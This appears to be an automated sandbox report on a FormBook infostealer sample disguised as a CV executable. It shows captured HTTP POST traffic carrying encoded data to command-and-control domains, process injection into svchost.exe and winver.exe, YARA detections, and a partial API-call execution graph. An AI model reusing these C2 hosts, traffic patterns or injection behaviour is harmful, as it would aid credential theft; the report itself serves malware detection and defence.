                                                                                      Data Ascii: -size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      41 | 192.168.2.4 | 50043 | 172.67.168.228 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:41.862071991 CET | 719 | OUT | POST /gb2h/ HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.nmgzjwh.net
                                                                                      Referer: http://www.nmgzjwh.net/gb2h/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=JC6S3r9c0fSPApkTpE5nmTOtRLQ6lnygpz69ChpBApecouNjYT1iASsUJWKg6nM+wb6ug06EHWEoX0A9wzN0TbY5sR4bnwSDeEGWS1+SFDMcodnJm+BYauCGF904UFNYfSMMwUWFhg7jR6UFBLtILC/Pg8LlUYlNoMqTI7fxtdcbgenm8z3igLf7tg3bXX7Rvw==


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      42 | 192.168.2.4 | 50044 | 172.67.168.228 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:44.523943901 CET | 739 | OUT | POST /gb2h/ HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.nmgzjwh.net
                                                                                      Referer: http://www.nmgzjwh.net/gb2h/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=JC6S3r9c0fSPDI0T63hnhzOuerQ6vHy8pzG9CjEZA7qcoNZjbWZiBSsUdGKp+nM1wb2Ig1GEHWQoX0w9xAl7QrY7kx4d6ASDeEGWS1q4FDUcoNXJgr1bbuCZTt04QFNUfSMqwWivhm3jR48FBatJAC/zucLwENIIsMTEHKmTruYLs4q8tCW1yL7Iwn+vaUGY0w092/u75eL6RLpbSKcKxnU=


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      43 | 192.168.2.4 | 50045 | 172.67.168.228 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:47.202282906 CET | 10821 | OUT | POST /gb2h/ HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.nmgzjwh.net
                                                                                      Referer: http://www.nmgzjwh.net/gb2h/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:48.821084976 CET | 902 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:48 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSb3x4YC0arQMdCNS%2FiImRi2s5C%2Bo%2FFpK8h%2FlzNPerCzKbG1Q0gqwGQyaoyjBYvluIYtg%2Fd6k2FTINV%2Bz1hXANXAF8r0TkCXvI5ClYaRZh%2Bt2FkKjq%2FiBC5MIB3KMMPj%2BRE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e7797bcec31c43b-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10821&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      44 | 192.168.2.4 | 50046 | 172.67.168.228 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:49.863296032 CET | 459 | OUT | GET /gb2h/?3vNdCBvX=EASy0dFQ3+mIcpYj5hhEpzGwaoMP7Xj9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXHLAts09AmDfBZWK+en/xOBIa/+jQwvZyXLY=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:51.492211103 CET | 888 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:51 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WurFPj1JcJ1uFHk%2BFiD8RfeidKmi6k10MmkL4pZ033HGVq9QTaQWWSfHlkXEOUk4jA5zjvoHJgaar9hELacHOU8SxKPvQnyr2ItO0qmC0xxzbBoH1ATQugKDL5hNcNQeLQM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e7797cdaedc8c09-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=459&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      45 | 192.168.2.4 | 50047 | 194.58.112.174 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:57.261665106 CET | 731 | OUT | POST /gdvz/ HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.sklad-iq.online
                                                                                      Referer: http://www.sklad-iq.online/gdvz/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=10AjTt63EifBze9QEOL/8EPp6IYnfnlYZjwqdjyu4pOL1gk6Cpr2cs88t1QYYwnJwlxHvEZIQY5cSgqwMfC5ZDtnu4ipAorHh0KdprMLB4Okk51JbyAx9olq4jkgmI3uo1oCOyj+Lbyt+q7pYXWhCx/suvBlkI4rDG+wNBeXLeGCmoqtlsZnF5oMW4xE9Q+IoA==
                                                                                      Nov 24, 2024 08:12:58.667351961 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:58 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Nov 24, 2024 08:12:58.667390108 CET | 1236 | IN | Data Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                      Nov 24, 2024 08:12:58.667402983 CET | 1069 | IN | Data Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      46 | 192.168.2.4 | 50048 | 194.58.112.174 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:59.929430962 CET | 751 | OUT | POST /gdvz/ HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.sklad-iq.online
                                                                                      Referer: http://www.sklad-iq.online/gdvz/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=10AjTt63EifB1PNQBpf/6kP2woYnKXlcZj8qdmSA5a6L1FY6Dor2fs88nVQXFAnSwltlvFlIQY9cShawQ864YTtl7IirPIrHh0KdprpQB5qklJlJaWUy0Ilt/jkgwI3io1owOzPYLZ6t+vHpYFuiNx/qjPARnbVlN3XETjCqVfOjjun30d4wX5M/L/4wwTDBzJlBrzP2RrCvjmSLBWGlzks=
                                                                                      Nov 24, 2024 08:13:01.334291935 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:13:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Nov 24, 2024 08:13:01.334316969 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                      Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                      Nov 24, 2024 08:13:01.334328890 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                      Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 50049 | 194.58.112.174 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:13:02.588238955 CET | 10833 | OUT | POST /gdvz/ HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.sklad-iq.online
                                                                                      Referer: http://www.sklad-iq.online/gdvz/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:13:03.996877909 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:13:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 50050 | 194.58.112.174 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:13:05.331769943 CET | 463 | OUT | GET /gdvz/?3vNdCBvX=42oDQZKHBS2RpvFPN57q1Tvu2doBJ10tXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OicxtKtIH3MbSxhASop5ADKNulvt1+Wm0v0/w=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:13:06.695780993 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:13:06 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close



                                                                                      Target ID:0
                                                                                      Start time:02:08:59
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                      Imagebase:0x380000
                                                                                      File size:1'207'808 bytes
                                                                                      MD5 hash:DFFCFC55DBE3596498888C48F569ADCD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:02:09:01
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                      Imagebase:0xcf0000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:02:09:27
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe"
                                                                                      Imagebase:0xe60000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:6
                                                                                      Start time:02:09:30
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Windows\SysWOW64\winver.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                                                      Imagebase:0x30000
                                                                                      File size:57'344 bytes
                                                                                      MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:7
                                                                                      Start time:02:09:42
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe"
                                                                                      Imagebase:0xe60000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:8
                                                                                      Start time:02:09:55
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x800000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:4%
                                                                                        Dynamic/Decrypted Code Coverage:1.5%
                                                                                        Signature Coverage:11.2%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:149
GetSystemTimeAsFileTime 93552->93554 93553 384517 83 API calls 93553->93554 93554->93550 93554->93551 93554->93552 93554->93553 93555->93318 93557 3a35f0 ___lock_fhandle 93556->93557 93558 3a361c 93557->93558 93559 3a3604 93557->93559 93562 3a4e1c __lock_file 48 API calls 93558->93562 93565 3a3614 ___lock_fhandle 93558->93565 93585 3a7c0e 47 API calls __getptd_noexit 93559->93585 93561 3a3609 93586 3a6e10 8 API calls __wtof_l 93561->93586 93564 3a362e 93562->93564 93569 3a3578 93564->93569 93565->93324 93570 3a359b 93569->93570 93571 3a3587 93569->93571 93577 3a3597 93570->93577 93588 3a2c84 93570->93588 93628 3a7c0e 47 API calls __getptd_noexit 93571->93628 93573 3a358c 93629 3a6e10 8 API calls __wtof_l 93573->93629 93587 3a3653 LeaveCriticalSection LeaveCriticalSection _fseek 93577->93587 93581 3a35b5 93605 3ae9d2 93581->93605 93583 3a35bb 93583->93577 93584 3a1c9d _free 47 API calls 93583->93584 93584->93577 93585->93561 93586->93565 93587->93565 93589 3a2c97 93588->93589 93593 3a2cbb 93588->93593 93590 3a2933 __fflush_nolock 47 API calls 93589->93590 93589->93593 93591 3a2cb4 93590->93591 93630 3aaf61 93591->93630 93594 3aeb36 93593->93594 93595 3a35af 93594->93595 93596 3aeb43 93594->93596 93598 3a2933 93595->93598 93596->93595 93597 3a1c9d _free 47 API calls 93596->93597 93597->93595 93599 3a293d 93598->93599 93600 3a2952 93598->93600 93736 3a7c0e 47 API calls __getptd_noexit 93599->93736 93600->93581 93602 3a2942 93737 3a6e10 8 API calls __wtof_l 93602->93737 93604 3a294d 93604->93581 93606 3ae9de ___lock_fhandle 93605->93606 93607 3ae9fe 93606->93607 93608 3ae9e6 93606->93608 93610 3aea7b 93607->93610 93615 3aea28 93607->93615 93753 3a7bda 47 API calls __getptd_noexit 93608->93753 93757 3a7bda 47 API calls __getptd_noexit 93610->93757 93611 3ae9eb 93754 3a7c0e 47 API calls __getptd_noexit 93611->93754 93614 3aea80 93758 3a7c0e 47 API calls __getptd_noexit 93614->93758 93617 3aa8ed ___lock_fhandle 49 API calls 93615->93617 93619 3aea2e 93617->93619 93618 
3aea88 93759 3a6e10 8 API calls __wtof_l 93618->93759 93621 3aea4c 93619->93621 93622 3aea41 93619->93622 93755 3a7c0e 47 API calls __getptd_noexit 93621->93755 93738 3aea9c 93622->93738 93624 3ae9f3 ___lock_fhandle 93624->93583 93626 3aea47 93756 3aea73 LeaveCriticalSection __unlock_fhandle 93626->93756 93628->93573 93629->93577 93631 3aaf6d ___lock_fhandle 93630->93631 93632 3aaf8d 93631->93632 93633 3aaf75 93631->93633 93634 3ab022 93632->93634 93639 3aafbf 93632->93639 93728 3a7bda 47 API calls __getptd_noexit 93633->93728 93733 3a7bda 47 API calls __getptd_noexit 93634->93733 93637 3aaf7a 93729 3a7c0e 47 API calls __getptd_noexit 93637->93729 93638 3ab027 93734 3a7c0e 47 API calls __getptd_noexit 93638->93734 93655 3aa8ed 93639->93655 93643 3aaf82 ___lock_fhandle 93643->93593 93644 3ab02f 93735 3a6e10 8 API calls __wtof_l 93644->93735 93645 3aafc5 93647 3aafeb 93645->93647 93648 3aafd8 93645->93648 93730 3a7c0e 47 API calls __getptd_noexit 93647->93730 93664 3ab043 93648->93664 93651 3aafe4 93732 3ab01a LeaveCriticalSection __unlock_fhandle 93651->93732 93652 3aaff0 93731 3a7bda 47 API calls __getptd_noexit 93652->93731 93656 3aa8f9 ___lock_fhandle 93655->93656 93657 3aa946 EnterCriticalSection 93656->93657 93658 3a7cf4 __lock 47 API calls 93656->93658 93660 3aa96c ___lock_fhandle 93657->93660 93659 3aa91d 93658->93659 93661 3aa93a 93659->93661 93662 3aa928 InitializeCriticalSectionAndSpinCount 93659->93662 93660->93645 93663 3aa970 ___lock_fhandle LeaveCriticalSection 93661->93663 93662->93661 93663->93657 93665 3ab050 __ftell_nolock 93664->93665 93666 3ab0ac 93665->93666 93667 3ab08d 93665->93667 93698 3ab082 93665->93698 93672 3ab105 93666->93672 93673 3ab0e9 93666->93673 93669 3a7bda __lseeki64 47 API calls 93667->93669 93668 3aa70c __wtof_l 6 API calls 93670 3ab86b 93668->93670 93671 3ab092 93669->93671 93670->93651 93674 3a7c0e __wtof_l 47 API calls 93671->93674 93675 3ab11c 93672->93675 93679 3af82f __lseeki64_nolock 49 API calls 93672->93679 93676 
3a7bda __lseeki64 47 API calls 93673->93676 93678 3ab099 93674->93678 93680 3b3bf2 __flswbuf 47 API calls 93675->93680 93677 3ab0ee 93676->93677 93681 3a7c0e __wtof_l 47 API calls 93677->93681 93682 3a6e10 __wtof_l 8 API calls 93678->93682 93679->93675 93683 3ab12a 93680->93683 93684 3ab0f5 93681->93684 93682->93698 93685 3ab44b 93683->93685 93691 3a7a0d ____lc_codepage_func 47 API calls 93683->93691 93688 3a6e10 __wtof_l 8 API calls 93684->93688 93686 3ab7b8 WriteFile 93685->93686 93687 3ab463 93685->93687 93690 3ab7e1 GetLastError 93686->93690 93700 3ab410 93686->93700 93689 3ab55a 93687->93689 93697 3ab479 93687->93697 93688->93698 93702 3ab663 93689->93702 93705 3ab565 93689->93705 93690->93700 93692 3ab150 GetConsoleMode 93691->93692 93692->93685 93694 3ab189 93692->93694 93693 3ab81b 93693->93698 93699 3a7c0e __wtof_l 47 API calls 93693->93699 93694->93685 93695 3ab199 GetConsoleCP 93694->93695 93695->93700 93716 3ab1c2 93695->93716 93696 3ab4e9 WriteFile 93696->93690 93701 3ab526 93696->93701 93697->93693 93697->93696 93698->93668 93703 3ab843 93699->93703 93700->93693 93700->93698 93704 3ab7f7 93700->93704 93701->93697 93701->93700 93722 3ab555 93701->93722 93702->93693 93707 3ab6d8 WideCharToMultiByte 93702->93707 93708 3a7bda __lseeki64 47 API calls 93703->93708 93709 3ab7fe 93704->93709 93710 3ab812 93704->93710 93705->93693 93706 3ab5de WriteFile 93705->93706 93706->93690 93711 3ab62d 93706->93711 93707->93690 93721 3ab71f 93707->93721 93708->93698 93713 3a7c0e __wtof_l 47 API calls 93709->93713 93712 3a7bed __dosmaperr 47 API calls 93710->93712 93711->93700 93711->93705 93711->93722 93712->93698 93715 3ab803 93713->93715 93714 3ab727 WriteFile 93717 3ab77a GetLastError 93714->93717 93714->93721 93718 3a7bda __lseeki64 47 API calls 93715->93718 93716->93700 93719 3a1688 __chsize_nolock 57 API calls 93716->93719 93723 3ab28f WideCharToMultiByte 93716->93723 93724 3b40f7 59 API calls __chsize_nolock 93716->93724 93726 3ab2f6 93716->93726 93717->93721 
